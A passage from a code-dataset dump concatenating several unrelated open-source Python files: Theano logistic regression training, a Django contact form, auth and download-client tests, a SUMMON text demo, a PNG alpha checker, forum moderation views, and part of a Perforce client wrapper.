index = T.lscalar() # index to a [mini]batch
x = T.matrix('x') # each row is a sample
y = T.ivector('y') # the labels are presented as 1D vector of [int] labels
num_feat=train_set_x.get_value(borrow=True).shape[1]
#print train_set_y.get_value()
n_cl=len(numpy.unique(train_set_y_org))
classifier = LogisticRegression(input=x, n_in=num_feat, n_out=n_cl)
# the cost we minimize during training is the negative log likelihood of
# the model in symbolic format
cost = classifier.negative_log_likelihood(y)
# compiling a Theano function that computes the mistakes that are made by
# the model on a minibatch
validate_model = theano.function(inputs=[index],
outputs=classifier.errors(y),
givens={
x: valid_set_x[index * batch_size:(index + 1) * batch_size],
y: valid_set_y[index * batch_size:(index + 1) * batch_size]})
validate_model2 = theano.function(inputs=[],
outputs=classifier.errors(y),
givens={
x: valid_set_x,
y: valid_set_y})
validate_model3 = theano.function(inputs=[],
outputs=classifier.y_pred,
givens={x:valid_set_x})
# compute the gradient of cost with respect to theta = (W,b)
g_W = T.grad(cost=cost, wrt=classifier.W)
g_b = T.grad(cost=cost, wrt=classifier.b)
# specify how to update the parameters of the model as a list of
# (variable, update expression) pairs.
updates = [(classifier.W, classifier.W - learning_rate * g_W),
(classifier.b, classifier.b - learning_rate * g_b)]
# compiling a Theano function `train_model_one_iteration` that returns the cost, but in
# the same time updates the parameter of the model based on the rules
# defined in `updates`
train_model_one_iteration = theano.function(inputs=[index],
outputs=cost,
updates=updates,
givens={
x: train_set_x[index * batch_size:(index + 1) * batch_size],
y: train_set_y[index * batch_size:(index + 1) * batch_size]})
# training the model below
# early-stopping parameters
patience = 5000 # look as this many examples regardless
patience_increase = 2 # wait this much longer when a new best is
# found
improvement_threshold = 0.995 # a relative improvement of this much is
# considered significant
validation_frequency = min(n_train_batches, patience / 2)
# go through this many
# minibatche before checking the network
# on the validation set; in this case we
# check every epoch
best_validation_loss = numpy.inf
max_num_epoch_change_learning_rate=100 # initial maximal number of epochs to change learning rate
max_num_epoch_not_improve=3*max_num_epoch_change_learning_rate # max number of epochs without improvmenet to terminate the optimization
max_num_epoch_change_rate=0.8 # change to max number of epochs to change learning rate
learning_rate_decay_rate=0.8
epoch_change_count=0
start_time = time.clock()
done_looping = False
epoch = 0
while (epoch < n_epochs) and (not done_looping):
epoch = epoch + 1
epoch_change_count=epoch_change_count+1
if epoch_change_count % max_num_epoch_change_learning_rate ==0:
reduce_learning_rate(learning_rate_decay_rate)
max_num_epoch_change_learning_rate= \
cl.change_max_num_epoch_change_learning_rate(max_num_epoch_change_learning_rate,max_num_epoch_change_rate)
max_num_epoch_not_improve=3*max_num_epoch_change_learning_rate
epoch_change_count=0
for minibatch_index in xrange(n_train_batches):
minibatch_avg_cost = train_model_one_iteration(minibatch_index)
# iteration number
iter = (epoch - 1) * n_train_batches + minibatch_index
if (iter + 1) % validation_frequency == 0:
# compute zero-one loss on validation set
validation_losses = [validate_model(i)
for i in xrange(n_valid_batches)]
this_validation_loss = numpy.mean(validation_losses)
print('epoch %i, minibatch %i/%i, validation error %f %%' % \
(epoch, minibatch_index + 1, n_train_batches,
this_validation_loss * 100.))
# if we got the best validation score until now
if this_validation_loss < best_validation_loss:
num_epoch_not_improve=0
if this_validation_loss < best_validation_loss:
#improve patience if loss improvement is good enough
if this_validation_loss < best_validation_loss * \
improvement_threshold:
patience = max(patience, iter * patience_increase)
best_validation_loss = this_validation_loss
# save a copy of the currently best model parameter
best_model_params=classifier.get_params()
if patience <= iter:
done_looping = True
break
if this_validation_loss >= best_validation_loss:
num_epoch_not_improve=num_epoch_not_improve+1
if num_epoch_not_improve>=max_num_epoch_not_improve:
done_looping = True
break
# set the best model parameters
classifier.set_params(best_model_params)
end_time = time.clock()
training_time=end_time-start_time
print 'Training time: %f' %(training_time/60)
print 'Optimization complete with best validation score of %f,' %(best_validation_loss * 100.)
return classifier,training_time
def test_model(classifier_trained,test_set_x_org):
"""
Predict class labels of given data using the model learned.
INPUTS:
classifier_trained: object of logisticRegression, the model learned by function "train_model".
test_set_x_org: numpy 2d array, each row is a sample whose label to be predicted.
OUTPUTS:
y_predicted: numpy int vector, the class labels predicted.
test_set_y_predicted_prob: numpy float vector, the probabilities.
test_time: test time in seconds.
"""
start_time=time.clock()
test_set_x=theano.shared(numpy.asarray(test_set_x_org,dtype=theano.config.floatX),borrow=True)
data = T.matrix('data')
get_y_pred,get_y_pred_prob=classifier_trained.get_predicted(data)
test_model_func = theano.function(inputs=[data], outputs=[get_y_pred,get_y_pred_prob])
y_predicted,y_predicted_prob=test_model_func(test_set_x.get_value(borrow=True))
end_time=time.clock()
test_time=end_time-start_time
return y_predicted,y_predicted_prob,test_time
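# Minimal usage sketch (illustrative only -- the arrays below are random
# placeholders, not real data):
#
#   import numpy
#   rng = numpy.random.RandomState(0)
#   train_x = rng.rand(1000, 50); train_y = rng.randint(0, 3, 1000)
#   valid_x = rng.rand(200, 50);  valid_y = rng.randint(0, 3, 200)
#   classifier, train_time = train_model(
#       learning_rate=0.1, n_epochs=100, batch_size=100,
#       train_set_x_org=train_x, train_set_y_org=train_y,
#       valid_set_x_org=valid_x, valid_set_y_org=valid_y)
#   y_pred, y_pred_prob, test_time = test_model(classifier, valid_x)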
| bsd-3-clause | -6,817,652,860,176,498,000 | 42.611898 | 155 | 0.614875 | false |
mimischi/django-clock | clock/contact/forms.py | 1 | 1685 | # -*- coding: utf-8 -*-
from captcha.fields import ReCaptchaField
from crispy_forms.bootstrap import FormActions
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from django import forms
from django.conf import settings
from django.core.mail import send_mail
from django.http import HttpResponseRedirect
from django.utils.translation import get_language
from django.utils.translation import ugettext_lazy as _
class ContactForm(forms.Form):
name = forms.CharField(max_length=200, label=_("Name"))
sender = forms.EmailField(label=_("E-Mail"))
message = forms.CharField(widget=forms.Textarea, label=_("Message"))
cc_myself = forms.BooleanField(
label=_("Send a copy of the mail to myself"), required=False
)
captcha = ReCaptchaField(attrs={"lang": get_language()})
def __init__(self, *args, **kwargs):
super(ContactForm, self).__init__(*args, **kwargs)
self.helper = FormHelper(self)
self.helper.form_action = "."
self.helper.form_method = "post"
self.helper.form_class = "form-halfpage"
self.helper.layout.append(
FormActions(
Submit("submit", _("Submit"), css_class="btn btn-primary pull-right")
)
)
def send_mail(self, form):
message = form.cleaned_data["message"]
sender = form.cleaned_data["sender"]
cc_myself = form.cleaned_data["cc_myself"]
recipients = settings.CONTACT_FORM_RECIPIENT
if cc_myself:
recipients.append(sender)
send_mail(settings.CONTACT_FORM_SUBJECT, message, sender, recipients)
return HttpResponseRedirect("/thanks/")
| mit | 1,497,578,063,128,168,000 | 35.630435 | 85 | 0.667656 | false |
wazo-pbx/xivo-auth | integration_tests/suite/database/test_db_group.py | 1 | 7050 | # Copyright 2016-2021 The Wazo Authors (see the AUTHORS file)
# SPDX-License-Identifier: GPL-3.0-or-later
from hamcrest import (
assert_that,
calling,
contains,
contains_inanyorder,
empty,
equal_to,
has_entries,
has_key,
has_properties,
)
from xivo_test_helpers.mock import ANY_UUID
from xivo_test_helpers.hamcrest.raises import raises
from wazo_auth import exceptions
from wazo_auth.database import models
from ..helpers import fixtures, base
TENANT_UUID = 'a26c4ed8-767f-463e-a10a-42c4f220d375'
class TestGroupDAO(base.DAOTestCase):
@fixtures.db.group()
@fixtures.db.policy()
def test_add_policy(self, group_uuid, policy_uuid):
assert_that(self._policy_dao.list_(group_uuid=group_uuid), empty())
self._group_dao.add_policy(group_uuid, policy_uuid)
result = self._policy_dao.list_(group_uuid=group_uuid)
assert_that(result, contains(has_properties(uuid=policy_uuid)))
self._group_dao.add_policy(group_uuid, policy_uuid) # twice
assert_that(
calling(self._group_dao.add_policy).with_args(
self.unknown_uuid, policy_uuid
),
raises(exceptions.UnknownGroupException),
'unknown group',
)
assert_that(
calling(self._group_dao.add_policy).with_args(
group_uuid, self.unknown_uuid
),
raises(exceptions.UnknownPolicyException),
'unknown policy',
)
@fixtures.db.group()
@fixtures.db.user()
def test_add_user(self, group_uuid, user_uuid):
assert_that(self._user_dao.list_(group_uuid=group_uuid), empty())
self._group_dao.add_user(group_uuid, user_uuid)
result = self._user_dao.list_(group_uuid=group_uuid)
assert_that(result, contains(has_entries(uuid=user_uuid)))
self._group_dao.add_user(group_uuid, user_uuid) # twice
assert_that(
calling(self._group_dao.add_user).with_args(self.unknown_uuid, user_uuid),
raises(exceptions.UnknownGroupException),
'unknown group',
)
assert_that(
calling(self._group_dao.add_user).with_args(group_uuid, self.unknown_uuid),
raises(exceptions.UnknownUserException),
'unknown user',
)
@fixtures.db.group(name='foo')
@fixtures.db.group(name='bar')
@fixtures.db.group(name='baz')
def test_count(self, *ignored):
result = self._group_dao.count()
assert_that(result, equal_to(3))
result = self._group_dao.count(name='foo', filtered=False)
assert_that(result, equal_to(3))
result = self._group_dao.count(search='ba', filtered=False)
assert_that(result, equal_to(3))
result = self._group_dao.count(name='foo', filtered=True)
assert_that(result, equal_to(1))
result = self._group_dao.count(search='ba', filtered=True)
assert_that(result, equal_to(2))
@fixtures.db.tenant(uuid=TENANT_UUID)
@fixtures.db.group(name='foobar', tenant_uuid=TENANT_UUID)
def test_create(self, tenant_uuid, group_uuid):
name = 'foobar'
assert_that(group_uuid, equal_to(ANY_UUID))
filter_ = models.Group.uuid == group_uuid
group = self.session.query(models.Group).filter(filter_).first()
assert_that(group, has_properties(name=name, tenant_uuid=tenant_uuid))
assert_that(
calling(self._group_dao.create).with_args(
name, tenant_uuid, system_managed=False
),
raises(exceptions.ConflictException).matching(
has_properties(
'status_code', 409, 'resource', 'groups', 'details', has_key('name')
)
),
)
@fixtures.db.group()
def test_delete(self, group_uuid):
self._group_dao.delete(group_uuid)
assert_that(
calling(self._group_dao.delete).with_args(group_uuid),
raises(exceptions.UnknownGroupException),
)
@fixtures.db.user()
@fixtures.db.user()
@fixtures.db.group(name='foo')
@fixtures.db.group(name='bar')
@fixtures.db.group(name='baz')
def test_list(self, user1_uuid, user2_uuid, *group_uuids):
def build_list_matcher(*names):
return [has_entries('name', name) for name in names]
result = self._group_dao.list_()
expected = build_list_matcher('foo', 'bar', 'baz')
assert_that(result, contains_inanyorder(*expected))
for group_uuid in group_uuids:
self._group_dao.add_user(group_uuid, user1_uuid)
self._group_dao.add_user(group_uuid, user2_uuid)
result = self._group_dao.list_()
expected = build_list_matcher('foo', 'bar', 'baz')
assert_that(result, contains_inanyorder(*expected))
result = self._group_dao.list_(name='foo')
expected = build_list_matcher('foo')
assert_that(result, contains_inanyorder(*expected))
result = self._group_dao.list_(search='ba')
expected = build_list_matcher('bar', 'baz')
assert_that(result, contains_inanyorder(*expected))
result = self._group_dao.list_(order='name', direction='desc')
expected = build_list_matcher('foo', 'baz', 'bar')
assert_that(result, contains(*expected))
result = self._group_dao.list_(order='name', direction='asc', limit=2)
expected = build_list_matcher('bar', 'baz')
assert_that(result, contains(*expected))
result = self._group_dao.list_(order='name', direction='asc', offset=1)
expected = build_list_matcher('baz', 'foo')
assert_that(result, contains(*expected))
@fixtures.db.group()
@fixtures.db.policy()
def test_remove_policy(self, group_uuid, policy_uuid):
nb_deleted = self._group_dao.remove_policy(group_uuid, policy_uuid)
assert_that(nb_deleted, equal_to(0))
self._group_dao.add_policy(group_uuid, policy_uuid)
nb_deleted = self._group_dao.remove_policy(self.unknown_uuid, policy_uuid)
assert_that(nb_deleted, equal_to(0))
nb_deleted = self._group_dao.remove_policy(group_uuid, self.unknown_uuid)
assert_that(nb_deleted, equal_to(0))
nb_deleted = self._group_dao.remove_policy(group_uuid, policy_uuid)
assert_that(nb_deleted, equal_to(1))
@fixtures.db.user()
@fixtures.db.group()
def test_remove_user(self, user_uuid, group_uuid):
nb_deleted = self._group_dao.remove_user(group_uuid, user_uuid)
assert_that(nb_deleted, equal_to(0))
self._group_dao.add_user(group_uuid, user_uuid)
nb_deleted = self._group_dao.remove_user(self.unknown_uuid, user_uuid)
assert_that(nb_deleted, equal_to(0))
nb_deleted = self._group_dao.remove_user(group_uuid, self.unknown_uuid)
assert_that(nb_deleted, equal_to(0))
nb_deleted = self._group_dao.remove_user(group_uuid, user_uuid)
assert_that(nb_deleted, equal_to(1))
| gpl-3.0 | 9,132,239,293,789,364,000 | 34.427136 | 88 | 0.620142 | false |
NCI-GDC/gdc-client | tests/test_download_client.py | 1 | 6942 | import argparse
from multiprocessing import cpu_count
import os
from pathlib import Path
import pytest
import tarfile
from typing import List
from unittest.mock import patch
from gdc_client.common.config import GDCClientArgumentParser
from gdc_client.parcel.const import HTTP_CHUNK_SIZE, SAVE_INTERVAL
from gdc_client.parcel.download_stream import DownloadStream
from conftest import make_tarfile, md5, uuids
from gdc_client.download.client import GDCHTTPDownloadClient, fix_url
from gdc_client.download.parser import download
from gdc_client.query.index import GDCIndexClient
BASE_URL = "http://127.0.0.1:5000"
@pytest.mark.usefixtures("setup_mock_server")
class TestDownloadClient:
@pytest.fixture(autouse=True)
def setup_method_fixture(self, tmp_path: Path) -> None:
self.index_client = GDCIndexClient(BASE_URL)
self.tmp_path = tmp_path
# use str version to be 3.5 compatible
self.client_kwargs = self.get_client_kwargs(str(self.tmp_path))
self.client = self.get_download_client()
self.argparse_args = self.get_argparse_args(str(self.tmp_path))
def get_client_kwargs(self, path: str) -> dict:
return {
"token": "valid token",
"n_procs": min(cpu_count(), 8),
"directory": path,
"segment_md5sums": True,
"file_md5sum": True,
"debug": True,
"http_chunk_size": HTTP_CHUNK_SIZE,
"save_interval": SAVE_INTERVAL,
"download_related_files": True,
"download_annotations": True,
"no_auto_retry": True,
"retry_amount": 5,
"verify": True,
}
def get_argparse_args(self, path: str) -> argparse.Namespace:
cmd_line_args = {
"server": BASE_URL,
"n_processes": 1,
"dir": path,
"save_interval": SAVE_INTERVAL,
"http_chunk_size": HTTP_CHUNK_SIZE,
"no_segment_md5sums": False,
"no_file_md5sum": False,
"no_verify": False,
"no_related_files": False,
"no_annotations": False,
"no_auto_retry": False,
"retry_amount": 1,
"wait_time": 5.0,
"latest": False,
"color_off": False,
"file_ids": [],
"manifest": [],
"token_file": "valid token",
"debug": True,
}
args = argparse.Namespace()
args.__dict__.update(cmd_line_args)
return args
def get_download_client(self, uuids: List[str] = None) -> GDCHTTPDownloadClient:
if uuids is not None:
# get annotation id out of metadata
self.index_client._get_metadata(uuids)
return GDCHTTPDownloadClient(
uri=BASE_URL, index_client=self.index_client, **self.client_kwargs
)
def test_download_files_with_fake_uuid_throw_exception_to_developer(self) -> None:
url_with_fake_uuid = BASE_URL + "/data/fake-uuid"
with pytest.raises(RuntimeError):
self.client.download_files([url_with_fake_uuid])
def test_download_files_with_fake_uuid_not_throw_exception_to_user(self) -> None:
url_with_fake_uuid = BASE_URL + "/data/fake-uuid"
self.client_kwargs["debug"] = False
client_with_debug_off = self.get_download_client()
client_with_debug_off.download_files([url_with_fake_uuid])
def test_untar_file(self) -> None:
files_to_tar = ["small", "small_ann", "small_rel", "small_no_friends"]
tarfile_name = make_tarfile(files_to_tar)
self.client._untar_file(tarfile_name)
assert all((self.tmp_path / f).exists() for f in files_to_tar)
def test_md5_members(self) -> None:
files_to_tar = ["small", "small_ann", "small_rel", "small_no_friends"]
client = self.get_download_client(files_to_tar)
tarfile_name = make_tarfile(files_to_tar)
client._untar_file(tarfile_name)
errors = client._md5_members(files_to_tar)
assert errors == []
def test_download_tarfile(self) -> None:
# this is done after the small file sorting happens,
# so pick UUIDs that would be grouped together
files_to_dl = ["small_no_friends"]
client = self.get_download_client(files_to_dl)
# it will remove redundant uuids
tarfile_name, errors = client._download_tarfile(files_to_dl)
assert tarfile_name is not None
assert os.path.exists(tarfile_name)
assert tarfile.is_tarfile(tarfile_name) is True
with tarfile.open(tarfile_name, "r") as t:
for member in t.getmembers():
contents = t.extractfile(member).read().decode()
assert contents == uuids[member.name]["contents"]
def test_download_annotations(self) -> None:
# uuid of file that has an annotation
small_ann = "small_ann"
# where we expect annotations to be written
dir_path = self.tmp_path / small_ann
dir_path.mkdir()
file_path = dir_path / "annotations.txt"
client = self.get_download_client([small_ann])
# we mock the response from api, a gzipped tarfile with an annotations.txt in it
# this code will open that and write the annotations.txt to a particular path
# no return
client.download_annotations(small_ann)
# verify
assert file_path.exists(), "failed to write annotations file"
assert (
file_path.read_text() == uuids["annotations.txt"]["contents"]
), "annotations content incorrect"
@pytest.mark.parametrize("check_segments", (True, False))
def test_no_segment_md5sums_args(self, check_segments: bool) -> None:
self.client_kwargs["segment_md5sums"] = check_segments
self.get_download_client()
assert DownloadStream.check_segment_md5sums is check_segments
@patch("gdc_client.parcel.download_stream.max_timeout", 1)
def test_retry_entire_download(self) -> None:
file_ids = ["big_no_friends"]
self.argparse_args.file_ids = file_ids
parser = GDCClientArgumentParser()
download(parser, self.argparse_args)
file_path = self.tmp_path / file_ids[0] / "test_file.txt"
temp_file_path = self.tmp_path / file_ids[0] / "test_file.txt.partial"
assert file_path.exists(), "Failed to write test_file.txt"
assert (
file_path.read_text() == uuids["big_no_friends"]["contents"]
), "File contents of test_file.txt are incorrect"
assert (
not temp_file_path.exists()
), "test_file.txt.partial should not exist on successful download"
def test_fix_url() -> None:
fixed_url = "https://api.gdc.cancer.gov/"
assert fix_url("api.gdc.cancer.gov") == fixed_url
assert fix_url(fixed_url) == fixed_url
assert fix_url("api.gdc.cancer.gov/") == fixed_url
| apache-2.0 | 2,527,070,955,373,266,000 | 35.34555 | 88 | 0.615529 | false |
mdrasmus/summon | examples/10_text.py | 1 | 4125 | #!/usr/bin/env python-i
# SUMMON examples
# 10_text.py - example of text
#
# Try zoomin in and out so see affects on text. Use CTRL-right drag and
# SHIFT-right drag to zoom and x and y axis separately.
#
# make summon commands available
from summon.core import *
from summon import shapes
import summon
win = summon.Window("10_text")
width = 100
a = 0
b = width * (1/3.0)
c = width * (2/3.0)
d = width
##################
# Bitmap Text
#
# Always the same on-screen size. Clips when text cannot fit in bounding box
#
x = 0
y = 0
win.add_group(translate(x, y,
# draw white box and title text
color(1,1,1),
shapes.box(0, 0, width, width, fill=False),
text("bitmap (text)", a, d+b/2, d, d+d, "bottom", "center"),
# draw demo text with each justification
text("NW", a, c, b, d, "top", "left"),
text("N", b, c, c, d, "top", "center"),
text("NE", c, c, d, d, "top", "right"),
text("W", a, b, b, c, "middle", "left"),
text("X", b, b, c, c, "middle", "center"),
text("E", c, b, d, c, "middle", "right"),
text("SW", a, a, b, b, "bottom", "left"),
text("S", b, a, c, b, "bottom", "center"),
text("SE", c, a, d, b, "bottom", "right")))
##################
# Scale Text
#
# Text is drawn with lines. Always visible, scales to fit as large as
# possible inside bounding box
#
x = 110
y = 0
win.add_group(
translate(x, y,
# draw white box and title text
color(1,1,1),
shapes.box(0, 0, width, width, fill=False),
text_scale("vector (text_scale)", a, d+b/2, d, d+d, "bottom", "center"),
# draw demo text with each justification
text_scale("NW", a, c, b, d, "top", "left"),
text_scale("N", b, c, c, d, "top", "center"),
text_scale("NE", c, c, d, d, "top", "right"),
text_scale("W", a, b, b, c, "middle", "left"),
text_scale("X", b, b, c, c, "middle", "center"),
text_scale("E", c, b, d, c, "middle", "right"),
text_scale("SW", a, a, b, b, "bottom", "left"),
text_scale("S", b, a, c, b, "bottom", "center"),
text_scale("SE", c, a, d, b, "bottom", "right")))
##################
# Clip Text
#
# Similar to Scale Text except it has a minimum and maximum height. Also
# text will not distort when x and y axis are zoomed independently.
#
x = 220
y = 0
minsize = 10
maxsize = 33
win.add_group(
translate(x, y,
# draw white box and title text
color(1,1,1),
shapes.box(0, 0, width, width, fill=False),
text_clip("vector+clip (text_clip)", a, d+b/2, d, d+d,
0, maxsize, "bottom", "center"),
# draw demo text with each justification
text_clip("NW", a, c, b, d, minsize, maxsize, "top", "left"),
text_clip("N", b, c, c, d, minsize, maxsize, "top", "center"),
text_clip("NE", c, c, d, d, minsize, maxsize, "top", "right"),
text_clip("W", a, b, b, c, minsize, maxsize, "middle", "left"),
text_clip("X", b, b, c, c, minsize, maxsize, "middle", "center"),
text_clip("E", c, b, d, c, minsize, maxsize, "middle", "right"),
text_clip("SW", a, a, b, b, minsize, maxsize, "bottom", "left"),
text_clip("S", b, a, c, b, minsize, maxsize, "bottom", "center"),
text_clip("SE", c, a, d, b, minsize, maxsize, "bottom", "right")))
# center the "camera" so that all shapes are in view
win.home()
print
print "NOTE: use shift+right drag and ctrl+right drag to zoom"
print "x and y axis independently. Notice how the text on the left and"
print "right do not distort as the text in the middle does."
print
| gpl-2.0 | -6,255,340,098,910,020,000 | 32.811475 | 86 | 0.48703 | false |
xxd3vin/spp-sdk | tools/script/python/check_png_alpha.py | 1 | 2741 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#*************************************************************************
#
# This file is part of the UGE(Uniform Game Engine).
# Copyright (C) by SanPolo Co.Ltd.
# All rights reserved.
#
# See http://uge.spolo.org/ for more information.
#
# SanPolo Co.Ltd
# http://uge.spolo.org/ [email protected] [email protected]
#
#************************************************************************
import os, sys
import numpy
import Image
import argparse # for command-line argument handling
#import common # some common helper functions
import argparse
def encodeChinese(msg):
type = sys.getfilesystemencoding()
return msg.decode('utf-8').encode(type)
parser = argparse.ArgumentParser(description=encodeChinese('检测给定路径图片是否包含alpha通道'))
parser.add_argument('--str', action='store', dest='image_str',
help=encodeChinese('保存图片的路径'))
parser.add_argument('--log', action='store', dest='log_filename',
help=encodeChinese('输出错误日志'))
parser.add_argument('--version', action='version', version='%(prog)s 1.0')
args = parser.parse_args()
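# Expected invocation (assumed, for illustration): --str points to a text file
# listing one image path per line, e.g.
#   python check_png_alpha.py --str png_list.txt --log alpha_errors.log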
# check that the required arguments were given
if args.image_str is None :
print encodeChinese('没有输入保存图片文件的文件夹')
sys.exit()
if args.log_filename is None :
print encodeChinese('没有输入保存错误信息的日志文件名称')
sys.exit()
# path of the error log
# if an old error log already exists, delete it
if os.path.isfile(args.log_filename):
os.remove(args.log_filename)
file_path = open(args.image_str,'r')
file_info = file_path.read()
for item in file_info.split("\n"):
if len(item) != 0:
try:
img = Image.open(item)
except:
print str(item) + '\t' + encodeChinese("这个文件不是贴图,无法打开")
f = open(args.log_filename,'a')
f.write(str(item) + '\t' + encodeChinese("这个文件不是贴图,无法打开"))
f.write('\n')
f.close()
continue
        if img.mode.lower() == 'rgba':
img.load()
r,g,b,alpha = img.split()
arr = numpy.asarray(alpha)
count = 0;
print str(img.size)
print str(item)
try:
for i in range(0,img.size[0]-1):
for j in range(0,img.size[1]-1):
if arr[j][i]<127:
count += 1
except:
                print str(item) + '\t' + encodeChinese("for循环出现问题,并未计算其透明通道")
continue
if(count < 10):
                notAlphafile = str(item) + '\t' + encodeChinese("这个贴图文件的透明通道,透明的太少,不符合标准")
try:
f = open(args.log_filename,'a')
f.write(notAlphafile+'\n');
f.close()
except:
f.write(notAlphafile+'\n');
f.close()
            else:
                print str(item) + " is ok! " + str(count)
| mit | 599,075,209,702,383,100 | 24.378947 | 82 | 0.605558 | false |
nitely/Spirit | spirit/topic/moderate/views.py | 1 | 3059 | # -*- coding: utf-8 -*-
from django.utils import timezone
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib import messages
from django.utils.translation import gettext as _
from spirit.core.utils.views import is_post
from spirit.core.utils.decorators import moderator_required
from spirit.comment.models import Comment
from spirit.topic.models import Topic
@moderator_required
def _moderate(request, pk, field_name, to_value, action=None, message=None):
topic = get_object_or_404(Topic, pk=pk)
if is_post(request):
count = (
Topic.objects
.filter(pk=pk)
.exclude(**{field_name: to_value})
.update(**{
field_name: to_value,
'reindex_at': timezone.now()}))
if count and action is not None:
Comment.create_moderation_action(
user=request.user,
topic=topic,
action=action)
if message is not None:
messages.info(request, message)
return redirect(request.POST.get(
'next', topic.get_absolute_url()))
return render(
request=request,
template_name='spirit/topic/moderate.html',
context={'topic': topic})
def delete(request, pk):
return _moderate(
request=request,
pk=pk,
field_name='is_removed',
to_value=True,
message=_("The topic has been deleted"))
def undelete(request, pk):
return _moderate(
request=request,
pk=pk,
field_name='is_removed',
to_value=False,
message=_("The topic has been undeleted"))
def lock(request, pk):
return _moderate(
request=request,
pk=pk,
field_name='is_closed',
to_value=True,
action=Comment.CLOSED,
message=_("The topic has been locked"))
def unlock(request, pk):
return _moderate(
request=request,
pk=pk,
field_name='is_closed',
to_value=False,
action=Comment.UNCLOSED,
message=_("The topic has been unlocked"))
def pin(request, pk):
return _moderate(
request=request,
pk=pk,
field_name='is_pinned',
to_value=True,
action=Comment.PINNED,
message=_("The topic has been pinned"))
def unpin(request, pk):
return _moderate(
request=request,
pk=pk,
field_name='is_pinned',
to_value=False,
action=Comment.UNPINNED,
message=_("The topic has been unpinned"))
def global_pin(request, pk):
return _moderate(
request=request,
pk=pk,
field_name='is_globally_pinned',
to_value=True,
action=Comment.PINNED,
message=_("The topic has been globally pinned"))
def global_unpin(request, pk):
return _moderate(
request=request,
pk=pk,
field_name='is_globally_pinned',
to_value=False,
action=Comment.UNPINNED,
message=_("The topic has been globally unpinned"))
| mit | 8,956,407,924,800,457,000 | 24.491667 | 76 | 0.592677 | false |
theiviaxx/python-perforce | perforce/models.py | 1 | 35586 | # -*- coding: utf-8 -*-
"""
perforce.models
~~~~~~~~~~~~~~~
This module implements the main data models used by perforce
:copyright: (c) 2015 by Brett Dixon
:license: MIT, see LICENSE for more details
"""
import subprocess
import datetime
import traceback
import os
import marshal
import logging
import re
from collections import namedtuple
from functools import wraps
import path
import six
from perforce import errors
LOGGER = logging.getLogger(__name__)
CHAR_LIMIT = 8000
DATE_FORMAT = "%Y/%m/%d %H:%M:%S"
FORMAT = """Change: {change}
Client: {client}
User: {user}
Status: {status}
Description:
\t{description}
Files:
{files}
"""
NEW_FORMAT = """Change: new
Client: {client}
Status: new
Description:
\t{description}
"""
#: Error levels enum
ErrorLevel = namedtuple('ErrorLevel', 'EMPTY, INFO, WARN, FAILED, FATAL')(*range(5))
#: Connections status enum
ConnectionStatus = namedtuple('ConnectionStatus', 'OK, OFFLINE, NO_AUTH, INVALID_CLIENT')(*range(4))
#: File spec http://www.perforce.com/perforce/doc.current/manuals/cmdref/filespecs.html
FileSpec = namedtuple('FileSpec', 'depot,client')
RE_FILESPEC = re.compile(r'^"?(//[\w\d\_\/\.\s]+)"?\s')
def split_ls(func):
"""Decorator to split files into manageable chunks as not to exceed the windows cmd limit
:param func: Function to call for each chunk
:type func: :py:class:Function
"""
@wraps(func)
def wrapper(self, files, silent=True, exclude_deleted=False):
if not isinstance(files, (tuple, list)):
files = [files]
counter = 0
index = 0
results = []
while files:
if index >= len(files):
results += func(self, files, silent, exclude_deleted)
break
length = len(str(files[index]))
if length + counter > CHAR_LIMIT:
# -- at our limit
runfiles = files[:index]
files = files[index:]
counter = 0
index = 0
results += func(self, runfiles, silent, exclude_deleted)
runfiles = None
del runfiles
else:
index += 1
counter += length
return results
return wrapper
def camel_case(string):
"""Makes a string camelCase
:param string: String to convert
"""
return ''.join((string[0].lower(), string[1:]))
class Connection(object):
"""This is the connection to perforce and does all of the communication with the perforce server"""
def __init__(self, port=None, client=None, user=None, executable='p4', level=ErrorLevel.FAILED):
self._executable = executable
self._level = level
self._port = port
self._client = client
self._user = user
self.__getVariables()
# -- Make sure we can even proceed with anything
if self._port is None:
raise errors.ConnectionError('Perforce host could not be found, please set P4PORT or provide the hostname\
and port')
if self._user is None:
raise errors.ConnectionError('No user could be found, please set P4USER or provide the user')
def __repr__(self):
return '<Connection: {0}, {1}, {2}>'.format(self._port, str(self._client), self._user)
def __getVariables(self):
"""Parses the P4 env vars using 'set p4'"""
try:
startupinfo = None
if os.name == 'nt':
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
output = subprocess.check_output([self._executable, 'set'], startupinfo=startupinfo)
if six.PY3:
output = str(output, 'utf8')
except subprocess.CalledProcessError as err:
LOGGER.error(err)
return
p4vars = {}
for line in output.splitlines():
if not line:
continue
try:
k, v = line.split('=', 1)
except ValueError:
continue
p4vars[k.strip()] = v.strip().split(' (')[0]
if p4vars[k.strip()].startswith('(config'):
del p4vars[k.strip()]
self._port = self._port or os.getenv('P4PORT', p4vars.get('P4PORT'))
self._user = self._user or os.getenv('P4USER', p4vars.get('P4USER'))
self._client = self._client or os.getenv('P4CLIENT', p4vars.get('P4CLIENT'))
@property
def client(self):
"""The client used in perforce queries"""
if isinstance(self._client, six.string_types):
self._client = Client(self._client, self)
return self._client
@client.setter
def client(self, value):
if isinstance(value, Client):
self._client = value
elif isinstance(value, six.string_types):
self._client = Client(value, self)
else:
raise TypeError('{} not supported for client'.format(type(value)))
@property
def user(self):
"""The user used in perforce queries"""
return self._user
@property
def level(self):
"""The current exception level"""
return self._level
@level.setter
def level(self, value):
"""Set the current exception level"""
self._level = value
@property
def status(self):
"""The status of the connection to perforce"""
try:
# -- Check client
res = self.run(['info'])
if res[0]['clientName'] == '*unknown*':
return ConnectionStatus.INVALID_CLIENT
# -- Trigger an auth error if not logged in
self.run(['user', '-o'])
except errors.CommandError as err:
if 'password (P4PASSWD) invalid or unset' in str(err.args[0]):
return ConnectionStatus.NO_AUTH
if 'Connect to server failed' in str(err.args[0]):
return ConnectionStatus.OFFLINE
return ConnectionStatus.OK
def run(self, cmd, stdin=None, marshal_output=True, **kwargs):
"""Runs a p4 command and returns a list of dictionary objects
:param cmd: Command to run
:type cmd: list
:param stdin: Standard Input to send to the process
:type stdin: str
:param marshal_output: Whether or not to marshal the output from the command
:type marshal_output: bool
:param kwargs: Passes any other keyword arguments to subprocess
:raises: :class:`.error.CommandError`
:returns: list, records of results
"""
records = []
args = [self._executable, "-u", self._user, "-p", self._port]
if self._client:
args += ["-c", str(self._client)]
if marshal_output:
args.append('-G')
if isinstance(cmd, six.string_types):
raise ValueError('String commands are not supported, please use a list')
args += cmd
